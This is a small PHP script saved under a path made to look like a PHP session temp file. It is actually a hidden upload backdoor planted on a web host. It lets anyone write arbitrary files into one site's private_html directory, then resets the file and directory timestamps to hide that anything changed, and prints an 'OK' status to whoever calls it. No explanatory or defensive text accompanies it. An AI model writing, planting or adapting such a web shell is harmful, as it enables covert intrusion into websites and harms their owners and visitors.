File: /home/hotjamba/tmp/sess_8a3d01dd6b6d57cafe4c14e57221d58c
<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";$fp = "/home/hotjamba/domains/hotjamband.com/private_html/"; $fn = "hotjamband.com.css"; @chdir($fp); $tm = @filemtime($fp); print("\n<br>");if(@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { if($tm) { @touch($fn,$tm,$tm); @touch($fp,$tm,$tm); } print("<file>$fn</file><size>" . filesize($fn) . "</size><writable>" . is_writable($fn) . "</writable><date>" . @date("Y-m-d H:i:s", @filemtime($fn)) . "</date>"); }echo "Result:OK"; echo "</body></html>"; die;